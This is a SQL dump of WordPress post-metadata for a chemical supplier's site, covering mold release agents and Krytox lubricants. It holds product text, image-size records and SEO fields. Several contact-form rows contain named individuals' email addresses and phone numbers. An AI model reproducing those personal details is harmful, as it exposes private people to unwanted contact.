INSERT INTO `wp_postmeta` VALUES (22381, 419, '_ywtm_content_tab_description', 'ReleaSys 85 is a highly versatile water-based, semi-permanent mold release agent designed to exhibit superior durability, surface adhesion, and minimization of slip-stick.  Properly applied, our product develops a long lasting thin-film on the mold surface with minimal mold build-up. The aerosolized formula ensures proper application is achieved without the need for spray equipment.  ReleaSys 85 will not interfere with post-production finishing operation.  Benefits of this product include:\r\n<ul>\r\n 	<li>Exceptional release agent durability</li>\r\n 	<li>Clean, Non-oily, Non-migrating</li>\r\n 	<li>Ideal for lower complexity molds</li>\r\n 	<li>Improves quality and consistency of molded parts</li>\r\n 	<li>Minimizes mold build-up and fouling</li>\r\n</ul>\r\nSemi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>'); 
INSERT INTO `wp_postmeta` VALUES (22382, 419, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (22383, 2357, '_wp_attached_file', '2016/10/shutterstock_67406404.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22384, 2357, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4288;s:6:"height";i:2848;s:4:"file";s:33:"2016/10/shutterstock_67406404.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_67406404-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_67406404-800x531.jpg";s:5:"width";i:800;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_67406404-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_67406404-1600x1063.jpg";s:5:"width";i:1600;s:6:"height";i:1063;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_67406404-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_67406404-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_67406404-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_67406404-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22387, 296, '_wp_attachment_image_alt', 'ReleaSys 8500 Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (22392, 293, '_wp_old_slug', 'releasys-8500'); 
INSERT INTO `wp_postmeta` VALUES (22393, 293, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22394, 293, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22395, 293, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22396, 293, '_yoast_wpseo_focuskw_text_input', 'Rubber Molding Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (22397, 293, '_yoast_wpseo_focuskw', 'Rubber Molding Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (22398, 293, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22399, 293, '_yoast_wpseo_focuskeywords', '[{"keyword":"ReleaSys 8500","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (22402, 1113, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (22403, 1113, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22404, 1113, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (22405, 1113, '_yoast_wpseo_focuskw_text_input', 'Krytox TM7 Tire Mold'); 
INSERT INTO `wp_postmeta` VALUES (22406, 1113, '_yoast_wpseo_focuskw', 'Krytox TM7 Tire Mold'); 
INSERT INTO `wp_postmeta` VALUES (22407, 1113, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22408, 1113, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22409, 1113, '_wp_old_slug', 'krytox-tm7-for-tire-mold-industry'); 
INSERT INTO `wp_postmeta` VALUES (22410, 1113, '_yoast_wpseo_primary_category', ''); 
INSERT INTO `wp_postmeta` VALUES (22412, 2050, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (22417, 293, '_yoast_wpseo_linkdex', '96'); 
INSERT INTO `wp_postmeta` VALUES (22424, 2375, '_edit_lock', '1480426735:2'); 
INSERT INTO `wp_postmeta` VALUES (22425, 2375, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (22426, 291, '_wp_attachment_image_alt', 'Composite Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (22427, 290, '_wp_old_slug', 'releasys-8800'); 
INSERT INTO `wp_postmeta` VALUES (22428, 290, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22429, 290, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22430, 290, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22431, 290, '_yoast_wpseo_focuskw_text_input', 'Composite Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (22432, 290, '_yoast_wpseo_focuskw', 'Composite Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (22433, 290, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22434, 290, '_yoast_wpseo_focuskeywords', '[{"keyword":"ReleaSys 8800","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (22435, 290, '_yoast_wpseo_linkdex', '96'); 
INSERT INTO `wp_postmeta` VALUES (22436, 2376, '_wp_attached_file', '2016/10/shutterstock_83285767.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22437, 2376, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3317;s:6:"height";i:2211;s:4:"file";s:33:"2016/10/shutterstock_83285767.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_83285767-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_83285767-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_83285767-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_83285767-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_83285767-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_83285767-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_83285767-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_83285767-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22438, 2375, '_thumbnail_id', '2376'); 
INSERT INTO `wp_postmeta` VALUES (22440, 2375, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (22441, 2375, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22442, 2375, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (22443, 2375, '_yoast_wpseo_focuskw_text_input', 'XHT'); 
INSERT INTO `wp_postmeta` VALUES (22444, 2375, '_yoast_wpseo_focuskw', 'XHT'); 
INSERT INTO `wp_postmeta` VALUES (22445, 2375, '_yoast_wpseo_title', 'Krytox XHT Takes the Heat - Fluoropolymer Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (22446, 2375, '_yoast_wpseo_metadesc', 'The XHT line of fluoropolymer lubricants broadens the Krytox lubrication line to address long life lubrication needs of high temperature applications.'); 
INSERT INTO `wp_postmeta` VALUES (22447, 2375, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22448, 2375, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22449, 2375, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (22451, 2375, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (22455, 2375, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (22456, 2381, '_edit_lock', '1476300917:2'); 
INSERT INTO `wp_postmeta` VALUES (22457, 2381, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (22458, 2382, '_wp_attached_file', '2016/10/automotive.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22459, 2382, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1391;s:6:"height";i:686;s:4:"file";s:22:"2016/10/automotive.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"automotive-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:22:"automotive-800x395.jpg";s:5:"width";i:800;s:6:"height";i:395;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"automotive-768x379.jpg";s:5:"width";i:768;s:6:"height";i:379;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"automotive-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"automotive-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"automotive-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:22:"automotive-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22463, 2385, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (22464, 2385, '_seq_num', '34'); 
INSERT INTO `wp_postmeta` VALUES (22465, 2385, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22466, 2385, '_field_12', 'Jenifer Boyd'); 
INSERT INTO `wp_postmeta` VALUES (22467, 2385, '_field_13', 'PPG Aerospace'); 
INSERT INTO `wp_postmeta` VALUES (22468, 2385, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (22469, 2385, '_field_14', 'jboyd@ppg.com'); 
INSERT INTO `wp_postmeta` VALUES (22470, 2385, '_field_15', '(404) 353-5217'); 
INSERT INTO `wp_postmeta` VALUES (22471, 2385, '_field_16', 'Please send the most recent US English GHS version of the MSDS for MS-122AD, CLEAR 14 OZ AEROSOL  '); 
INSERT INTO `wp_postmeta` VALUES (22472, 2385, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (22473, 2385, '_sub_id', '2385'); 
INSERT INTO `wp_postmeta` VALUES (22474, 2386, '_wp_attached_file', '2016/10/shutterstock_442847356.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22475, 2386, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6000;s:6:"height";i:4000;s:4:"file";s:34:"2016/10/shutterstock_442847356.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_442847356-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_442847356-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_442847356-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_442847356-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_442847356-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_442847356-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_442847356-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_442847356-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22476, 2381, '_thumbnail_id', '2386'); 
INSERT INTO `wp_postmeta` VALUES (22478, 2381, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (22479, 2381, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (22480, 2381, 'ninja_forms_form', '1'); 
INSERT INTO `wp_postmeta` VALUES (22481, 2381, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22482, 2381, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (22483, 2381, '_yoast_wpseo_focuskw_text_input', 'Krytox Automotive'); 
INSERT INTO `wp_postmeta` VALUES (22484, 2381, '_yoast_wpseo_focuskw', 'Krytox Automotive'); 
INSERT INTO `wp_postmeta` VALUES (22485, 2381, '_yoast_wpseo_title', 'Krytox Automotive Applications Lubrication Points for Non-Bearings'); 
INSERT INTO `wp_postmeta` VALUES (22486, 2381, '_yoast_wpseo_metadesc', 'Krytox automotive oils and greases have proven scientific and technical properties to help solve the most critical issues in the automotive industry.'); 
INSERT INTO `wp_postmeta` VALUES (22487, 2381, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22488, 2381, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22489, 2381, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (22491, 2381, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (22495, 2390, '_edit_lock', '1476301796:2'); 
INSERT INTO `wp_postmeta` VALUES (22496, 2390, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (22497, 2391, '_wp_attached_file', '2016/10/Automotive-Grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22498, 2391, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1472;s:6:"height";i:756;s:4:"file";s:29:"2016/10/Automotive-Grease.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"Automotive-Grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:29:"Automotive-Grease-800x411.jpg";s:5:"width";i:800;s:6:"height";i:411;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"Automotive-Grease-768x394.jpg";s:5:"width";i:768;s:6:"height";i:394;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"Automotive-Grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"Automotive-Grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"Automotive-Grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:29:"Automotive-Grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22500, 2390, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (22501, 2390, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22502, 2390, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (22503, 2390, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22504, 2390, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22505, 2390, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (22512, 2397, '_wp_attached_file', '2016/10/automotive-lubricants.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22513, 2397, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1472;s:6:"height";i:756;s:4:"file";s:33:"2016/10/automotive-lubricants.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"automotive-lubricants-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"automotive-lubricants-800x411.jpg";s:5:"width";i:800;s:6:"height";i:411;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"automotive-lubricants-768x394.jpg";s:5:"width";i:768;s:6:"height";i:394;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"automotive-lubricants-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"automotive-lubricants-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"automotive-lubricants-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"automotive-lubricants-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22514, 2398, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (22515, 2398, '_seq_num', '35'); 
INSERT INTO `wp_postmeta` VALUES (22516, 2398, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22517, 2398, '_field_12', 'eric putnam'); 
INSERT INTO `wp_postmeta` VALUES (22518, 2398, '_field_13', 'newport'); 
INSERT INTO `wp_postmeta` VALUES (22519, 2398, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (22520, 2398, '_field_14', 'eric.putnam@newport.com'); 
INSERT INTO `wp_postmeta` VALUES (22521, 2398, '_field_15', '(949) 253-4444'); 
INSERT INTO `wp_postmeta` VALUES (22522, 2398, '_field_16', 'SDS for Miller-Stephenson MS-465C  confomal coating'); 
INSERT INTO `wp_postmeta` VALUES (22523, 2398, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (22524, 2398, '_sub_id', '2398'); 
INSERT INTO `wp_postmeta` VALUES (22525, 2399, '_wp_attached_file', '2016/10/shutterstock_295221404.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22526, 2399, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6000;s:6:"height";i:3500;s:4:"file";s:34:"2016/10/shutterstock_295221404.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_295221404-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_295221404-800x467.jpg";s:5:"width";i:800;s:6:"height";i:467;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_295221404-768x448.jpg";s:5:"width";i:768;s:6:"height";i:448;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_295221404-1600x933.jpg";s:5:"width";i:1600;s:6:"height";i:933;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_295221404-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_295221404-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_295221404-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_295221404-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22527, 2390, '_thumbnail_id', '2399'); 
INSERT INTO `wp_postmeta` VALUES (22529, 2390, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (22530, 2390, 'ninja_forms_form', '1'); 
INSERT INTO `wp_postmeta` VALUES (22531, 2390, '_yoast_wpseo_focuskw_text_input', 'Automotive Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (22532, 2390, '_yoast_wpseo_focuskw', 'Automotive Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (22533, 2390, '_yoast_wpseo_title', 'Krytox™ Automotive Lubricants | Solutions for the Automotive Industry'); 
INSERT INTO `wp_postmeta` VALUES (22534, 2390, '_yoast_wpseo_metadesc', 'Krytox™ performance automotive lubricants have helped customers outpace the competition by bringing customized and innovative solutions.'); 
INSERT INTO `wp_postmeta` VALUES (22535, 2390, '_wp_old_slug', 'krytox-solutions-automotive-industry'); 
INSERT INTO `wp_postmeta` VALUES (22537, 2390, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (22542, 1014, '_wp_old_slug', 'xp-2a4-2'); 
INSERT INTO `wp_postmeta` VALUES (22543, 1014, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22544, 1014, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22545, 1014, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22546, 1014, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22547, 1014, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22548, 1012, '_wp_old_slug', 'xp-2a4'); 
INSERT INTO `wp_postmeta` VALUES (22549, 1012, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22550, 1012, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22551, 1012, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22552, 1012, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22553, 1012, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22556, 672, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (22557, 2407, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (22558, 2407, '_seq_num', '36'); 
INSERT INTO `wp_postmeta` VALUES (22559, 2407, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22560, 2407, '_field_12', 'Cheri Richards'); 
INSERT INTO `wp_postmeta` VALUES (22561, 2407, '_field_13', 'GDSI'); 
INSERT INTO `wp_postmeta` VALUES (22562, 2407, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (22563, 2407, '_field_14', 'richardsc@gdsiswitches.com'); 
INSERT INTO `wp_postmeta` VALUES (22564, 2407, '_field_15', '(715) 268-6495'); 
INSERT INTO `wp_postmeta` VALUES (22565, 2407, '_field_16', 'MS-122AD...need SDS please'); 
INSERT INTO `wp_postmeta` VALUES (22566, 2407, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (22567, 2407, '_sub_id', '2407'); 
INSERT INTO `wp_postmeta` VALUES (22571, 1012, '_yoast_wpseo_focuskw_text_input', 'Krytox XP 2A5'); 
INSERT INTO `wp_postmeta` VALUES (22572, 1012, '_yoast_wpseo_focuskw', 'Krytox XP 2A5'); 
INSERT INTO `wp_postmeta` VALUES (22573, 2410, '_edit_lock', '1476301747:2'); 
INSERT INTO `wp_postmeta` VALUES (22574, 2410, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (22577, 2410, '_disclaimer_post_meta', ''); 
